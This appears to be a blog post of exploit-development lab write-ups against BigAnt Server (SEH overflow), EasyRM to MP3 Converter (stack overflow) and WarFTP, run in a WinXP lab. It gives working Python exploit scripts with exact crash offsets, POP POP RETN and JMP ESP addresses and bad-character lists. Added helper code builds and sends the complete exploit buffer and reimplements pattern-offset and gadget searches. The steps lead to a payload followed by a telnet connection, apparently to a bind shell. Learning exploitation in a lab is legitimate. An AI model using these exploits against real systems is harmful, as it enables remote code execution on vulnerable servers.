Thursday, 30 January 2014

BigAnt Server : SEH-based Buffer Overflow

- WinXP
- OllyDbg (debugger)
- BigAnt Server (target application, SEH overwrite)
- Fuzzer


1. Create Fuzzer





Port : 6660
Address : 192.168.56.102 (the BigAnt Server IP)

The fuzzer sends a string of 2500 "A" characters.

Run BigAnt Server.
Make sure AntServ is running, then attach OllyDbg to it.





After attaching to AntServ, run the fuzzer. In the debugger, ESI is filled with "AAAA..." but EIP is not overwritten; the application still crashes.



This application uses SEH, so open View > SEH chain.

The buffer we sent is clearly visible in the SEH chain. To pass the exception to the (overwritten) handler so that its bytes reach EIP, press Shift+F9.

Then right-click the value and Follow in Dump.

 

2. Bypass SEH
Search for a POP POP RETN:

View > Executable modules, double-click VBAJET32.DLL

Right-click > Search for > Sequence of commands

We find a POP POP RETN.

To find the offset of the SEH overwrite, create a 2500-byte pattern and put it in the fuzzer in place of the "A"s.








Restart BigAnt Server and OllyDbg, attach and set the breakpoint as in the first step.
Run the fuzzer, check the SEH chain, press Shift+F9 to pass the exception to the handler, and write down the EIP value:

EIP : 42326742

Run pattern_offset on it.

Conclusion: the SEH handler is overwritten 966 bytes into the pattern. Edit the fuzzer:

#!/usr/bin/python
import socket

target_address = "192.168.56.102"
target_port = 6660

buffer = b"USV "                   # 4-byte command prefix; the pattern started right after it
buffer += b"\x90" * 962            # filler: prefix + 962 NOPs = 966 bytes
buffer += b"\xCC\xCC\xCC\xCC"      # next SEH pointer (nSEH), pattern offset 962
buffer += b"\x41\x41\x41\x41"      # SEH handler, pattern offset 966
buffer += b"\x90" * (2504 - len(buffer))
buffer += b"\r\n\r\n"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
sock.close()

3. Control the CPU

Point the SEH handler at the POP POP RETN: 0F9A196A


#!/usr/bin/python
import socket

target_address = "192.168.56.102"
target_port = 6660

buffer = b"USV "
buffer += b"\x90" * 962
buffer += b"\xCC\xCC\xCC\xCC"      # nSEH: INT3 breakpoints, so we stop here in the debugger
buffer += b"\x6A\x19\x9A\x0F"      # SEH overwrite: POP POP RETN at 0F9A196A, little-endian
buffer += b"\x90" * (2504 - len(buffer))
buffer += b"\r\n\r\n"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
sock.close()

Attach and set the breakpoint as in the first step, then debug.
After the POP POP RETN we land in our buffer, but at the nSEH slot we only have 4 bytes to work with; that is not enough.


We need to find a larger region of our buffer in memory.



4. Shellcode

Create the payload:







Run the fuzzer,
then check the SEH chain.

The SEH handler is not valid.
Remove the payload from the fuzzer and run again (restart BigAnt Server and OllyDbg first), then check the SEH chain:
the SEH handler is valid again, so the payload itself contains bad characters.

We have to send the test bytes line by line to find the bad characters.

Use generatecodes.pl to produce the test bytes (0x00, 0x0a and 0x0d excluded up front):
root@bt:/opt# perl generatecodes.pl 00,0a,0d
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11"
"\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f"
"\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e"
"\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d"
"\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c"
"\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b"
"\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a"
"\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89"
"\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98"
"\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7"
"\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6"
"\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5"
"\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4"
"\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3"
"\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2"
"\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"

Restart BigAnt Server and OllyDbg, set the breakpoint.

First line

Second
Third

Finally, we find that \x20 is a bad character.
Add it to the payload generator's bad-character list and put the new payload in the fuzzer.

Restart OllyDbg and BigAnt Server, set the breakpoint, run the fuzzer.

5. Check for bad characters in the buffer










6. Payload Fix

Bad characters to exclude: 0x00 0x0a 0x0d 0x40 0x20 0x25




Edit the fuzzer to use the new payload.
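To tie sections 2 to 6 together, here is an added Python example (mine, not the page's fuzzer and not its payload) that lays out the final BigAnt buffer with the values found above: the "USV " prefix, 962 NOPs, nSEH at pattern offset 962, the POP POP RETN 0F9A196A as the SEH handler at offset 966, and the shellcode right after the SEH record. It also reproduces the generatecodes.pl byte run and the line-by-line comparison used to find bad characters, and refuses to build a buffer containing any byte from the list in section 6. Two things are assumptions rather than page content: the nSEH value is a short jump over the 8-byte SEH record (a standard way out of the 4-byte nSEH slot; the page used CC bytes there and went looking for more room instead), and the shellcode is a placeholder of INT3 breakpoints, not a real payload. The "dump" used to demonstrate the bad-character comparison is constructed.

```python
import struct

# Values taken from the write-up above.
TARGET_ADDRESS, TARGET_PORT = "192.168.56.102", 6660   # BigAnt Server
SEH_PATTERN_OFFSET = 966        # pattern_offset result for EIP 42326742
POP_POP_RET = 0x0F9A196A        # POP POP RETN found in VBAJET32.DLL
BAD_CHARS = b"\x00\x0a\x0d\x40\x20\x25"   # list from "6. Payload Fix"
TOTAL_LEN = 2504                # padding length used by the page's fuzzer
PREFIX = b"USV "                # command prefix sent before the pattern


def badchar_test_string(exclude=b"\x00\x0a\x0d"):
    """Same byte run generatecodes.pl prints: 0x01..0xff minus the excluded bytes."""
    return bytes(b for b in range(1, 256) if b not in exclude)


def first_mangled_byte(sent, dumped):
    """Compare the test string we sent with the bytes the debugger's dump shows at
    the same place; return the first sent byte that was dropped or altered, or None."""
    for i, b in enumerate(sent):
        if i >= len(dumped) or dumped[i] != b:
            return b
    return None


def bad_chars_in(data, bad=BAD_CHARS):
    """Sorted list of the bad characters that occur in data (empty list = clean)."""
    return sorted({b for b in data if b in bad})


def build_seh_buffer(shellcode, nseh=b"\xeb\x06\x90\x90", total=TOTAL_LEN):
    """Lay the request out the way the page's fuzzer does:
    PREFIX + NOP filler + nSEH + SEH + shellcode, padded to `total`, then CRLF CRLF.
    The pattern starts after the 4-byte prefix, so nSEH sits at buffer offset 966
    and the SEH handler at 970. The default nSEH is JMP SHORT +6 (assumption: a
    standard technique, not what the page sent there)."""
    filler = b"\x90" * (SEH_PATTERN_OFFSET - len(nseh))     # 962 NOPs, as in the page's fuzzer
    seh = struct.pack("<I", POP_POP_RET)                     # little-endian: 6A 19 9A 0F
    buf = PREFIX + filler + nseh + seh + shellcode
    if len(buf) > total:
        raise ValueError("shellcode too long for a %d-byte buffer" % total)
    buf += b"\x90" * (total - len(buf))
    # The prefix's own space (0x20) is the command separator, not payload, so skip it.
    bad = bad_chars_in(buf[len(PREFIX):])
    if bad:
        raise ValueError("bad characters in buffer: " + ", ".join("0x%02x" % b for b in bad))
    return buf + b"\r\n\r\n"


def send_buffer(buf, address=TARGET_ADDRESS, port=TARGET_PORT):
    """Deliver the buffer the same way the page's fuzzer does (network side, not exercised offline)."""
    import socket
    with socket.create_connection((address, port), timeout=5) as s:
        s.sendall(buf)


if __name__ == "__main__":
    sent = badchar_test_string()
    # Constructed dump: pretend the server cut our buffer at the first space (0x20).
    dumped = sent[:sent.index(0x20)]
    print("first bad byte: 0x%02x" % first_mangled_byte(sent, dumped))   # 0x20
    buf = build_seh_buffer(b"\xcc" * 32)   # placeholder shellcode: INT3 breakpoints, not a real payload
    print(len(buf), buf[966:974].hex())    # 2508 eb069090 6a199a0f
```

After a bad character is found, call badchar_test_string() again with it added to exclude and repeat; that is the loop the page runs by hand, one line of the dump at a time.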









Connect with telnet.




Buffer Overflow: EasyRM to MP3 Converter

Tools
- WinXP (operating system)
- EasyRM to MP3 Converter (target)
- OllyDbg (debugger)
- Fuzzer
- msfweb (to generate the payload)

Run WinXP in VirtualBox
and install EasyRM to MP3 Converter.


1. Create Fuzzer
~# nano easyRM.py

#!/usr/bin/python
filename = "fuzzer.m3u"
buffer = b"\x41" * 26100            # 26100 bytes of "A"
with open(filename, 'wb') as out_file:
    out_file.write(buffer)


filename: the script writes its output to fuzzer.m3u
buffer = b"\x41" * 26100 creates a string of 26100 "A" characters

After that:
# python easyRM.py
This runs easyRM.py and creates fuzzer.m3u.

Download fuzzer.m3u in WinXP with IE (start apache2 first to serve the file).






Open fuzzer.m3u in EasyRM and see what happens.


EasyRM crashed.
Now debug it with OllyDbg.

EIP is filled with 41414141,
because the string of "A"s is long enough to overwrite the saved return address on the stack and so reach EIP.

2. Replace the "A" string with a pattern
# ./pattern_create.rb 26100 > string.txt


Open string.txt and copy the pattern into the fuzzer.


After editing easyRM.py, run it, load the new fuzzer.m3u in EasyRM again and check what happens.






We get EIP = 48306C48 and ESP pointing at "2Hl3Hl4H"; these values go into pattern_offset.

3. Pattern Offset
Use pattern_offset on these values and update the fuzzer:
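As an added example (mine, not the page's tool and not Metasploit's code), here is a small Python reimplementation of the pattern_create / pattern_offset logic used in this step and in section 2 of the BigAnt write-up above. It handles the case this step runs into: the Aa0Aa1... pattern repeats every 20280 bytes, so a 26100-byte pattern contains the bytes behind EIP 48306C48 ("Hl0H" in memory) twice, at 5790 and 26070, and a lookup has to report every hit rather than just the first; the page's 26070 is the second one. The BigAnt EIP 42326742 resolves to 966, and the ESP string "2Hl3Hl4H" to 26078, 8 bytes past the EIP overwrite, so ESP lands inside the NOPs the page's fuzzer places after DEADBEEF. The register values are the page's; the function names are mine.

```python
import string
import struct

UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits
PERIOD = len(UPPER) * len(LOWER) * len(DIGITS) * 3   # 20280 bytes, after which the pattern repeats


def pattern_create(length):
    """Metasploit-style cyclic pattern Aa0Aa1Aa2...Az9Ba0... truncated to `length` bytes."""
    out = bytearray()
    while len(out) < length:
        for up in UPPER:
            for lo in LOWER:
                for d in DIGITS:
                    out += (up + lo + d).encode("ascii")
                    if len(out) >= length:
                        return bytes(out[:length])
    return bytes(out[:length])


def register_to_bytes(value):
    """A 32-bit register value as the debugger shows it ('42326742' or 0x42326742)
    -> the 4 bytes that were in memory, little-endian (b'Bg2B')."""
    if isinstance(value, str):
        value = int(value, 16)
    return struct.pack("<I", value)


def pattern_offsets(needle, length):
    """Every offset at which `needle` (bytes) occurs in a pattern of `length` bytes.
    Returns a list, not one int: once length > PERIOD the same 4 bytes occur more
    than once and the caller has to decide which hit is the real one."""
    hay = pattern_create(length)
    hits, start = [], 0
    while True:
        i = hay.find(needle, start)
        if i < 0:
            return hits
        hits.append(i)
        start = i + 1


if __name__ == "__main__":
    # BigAnt: EIP 42326742 after a 2500-byte pattern
    print(pattern_offsets(register_to_bytes("42326742"), 2500))        # [966]
    # EasyRM: EIP 48306C48 and ESP -> "2Hl3Hl4H" after a 26100-byte pattern
    print(pattern_offsets(register_to_bytes("48306C48"), 26100))       # [5790, 26070]
    print(pattern_offsets(b"2Hl3Hl4H", 26100))                         # [5798, 26078]
```

When a pattern is longer than 20280 bytes, the safer move is to use a pattern no longer than one period, or to send two different lengths and keep the hit that moves with the buffer.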




#!/usr/bin/python
filename = "fuzzer.m3u"
buffer = b"\x90" * 26070            # filler up to the EIP overwrite (pattern offset 26070)
buffer += b"\xEF\xBE\xAD\xDE"       # lands in EIP as DEADBEEF (little-endian)
buffer += b"\x90" * 32              # ESP points into these NOPs after the crash
with open(filename, 'wb') as out_file:
    out_file.write(buffer)


OK. After editing easyRM.py, run it again, download the new fuzzer.m3u and load it in EasyRM. It crashes; debug it with OllyDbg.



EIP contains DEADBEEF, which confirms that we control the EIP register.

4. Search for JMP ESP

Run EasyRM and attach OllyDbg.
View > Executable modules > USER32

In the main window: Search for > Command


JMP ESP : 7E429353
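The OllyDbg searches used here (Search for > Command for JMP ESP) and in the BigAnt write-up (Sequence of commands for POP POP RETN) can also be done by scanning a module's bytes directly. Below is an added Python example of that scan (mine, not an OllyDbg or page feature): it reports every POP r32; POP r32; RET and every JMP ESP / CALL ESP / PUSH ESP; RET in a byte image, and checks whether a candidate address survives a bad-character list, which is why a good-looking address can still be unusable. The module image and its base address 0x7E410000 are constructed stand-ins, not USER32 or VBAJET32; the addresses 7E429353 and 0F9A196A checked at the end are the page's.

```python
import struct

# x86 encodings involved (instruction-set facts, not values from the page)
POP_REG = range(0x58, 0x60)           # POP EAX .. POP EDI, one byte each
RET_OPCODES = (0xC3, 0xC2)            # RET, RET imm16
ESP_TRAMPOLINES = {
    b"\xff\xe4": "jmp esp",
    b"\xff\xd4": "call esp",
    b"\x54\xc3": "push esp; ret",
}


def find_pop_pop_ret(image, base):
    """Addresses of every POP r32; POP r32; RET sequence in `image`, assumed mapped at `base`.
    This is what 'Search for > Sequence of commands' finds when hunting an SEH handler."""
    hits = []
    for i in range(len(image) - 2):
        if image[i] in POP_REG and image[i + 1] in POP_REG and image[i + 2] in RET_OPCODES:
            hits.append(base + i)
    return hits


def find_esp_trampolines(image, base):
    """(address, mnemonic) for every JMP ESP / CALL ESP / PUSH ESP; RET in `image`:
    the candidates for a direct EIP overwrite when ESP points into our buffer."""
    hits = []
    for seq, name in ESP_TRAMPOLINES.items():
        start = 0
        while True:
            i = image.find(seq, start)
            if i < 0:
                break
            hits.append((base + i, name))
            start = i + 1
    return sorted(hits)


def address_is_clean(addr, bad_chars):
    """True if the little-endian bytes of addr (what actually goes into the buffer)
    avoid every bad character."""
    return not any(b in bad_chars for b in struct.pack("<I", addr))


def usable_addresses(addrs, bad_chars):
    """Filter a candidate list down to the addresses that can actually be sent."""
    return [a for a in addrs if address_is_clean(a, bad_chars)]


# Constructed stand-in for a module's code section (not a real DLL), assumed mapped at 0x7E410000
SAMPLE_BASE = 0x7E410000
_img = bytearray(b"\x90" * 0x80)
_img[0x10:0x13] = b"\x5e\x5d\xc3"            # pop esi; pop ebp; ret
_img[0x30:0x32] = b"\xff\xe4"                # jmp esp
_img[0x50:0x55] = b"\x5b\x5f\xc2\x08\x00"    # pop ebx; pop edi; ret 8
_img[0x70:0x73] = b"\x58\x90\xc3"            # pop eax; nop; ret: not a POP POP RET, must not match
SAMPLE_IMAGE = bytes(_img)

if __name__ == "__main__":
    for a in find_pop_pop_ret(SAMPLE_IMAGE, SAMPLE_BASE):
        print("POP POP RET at %08X" % a)
    for a, name in find_esp_trampolines(SAMPLE_IMAGE, SAMPLE_BASE):
        print("%s at %08X" % (name, a))
    bad = b"\x00\x0a\x0d\x40\x20\x25"         # BigAnt bad characters from the first write-up
    print("0F9A196A usable:", address_is_clean(0x0F9A196A, bad))   # True
    print("7E410030 usable:", address_is_clean(0x7E410030, bad))   # False: contains 0x00
```

Any address from a module mapped low enough to contain a 0x00 byte fails the check the moment 0x00 is a bad character, which is the usual reason to prefer a higher-mapped module such as the two the page picked.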
5. Set Payload


Generate the payload:




Run the Python script again,

load the new fuzzer.m3u in EasyRM,
and connect with telnet.


Wednesday, 29 January 2014

Buffer Overflow WarFTP (Payload) Final

Run msfweb





Open a browser at http://127.0.0.1:55555/
Menu Payloads > filter modules: win32


Generate the payload.
This is the result;
apply it in the fuzzer file,
run the fuzzer and connect with telnet.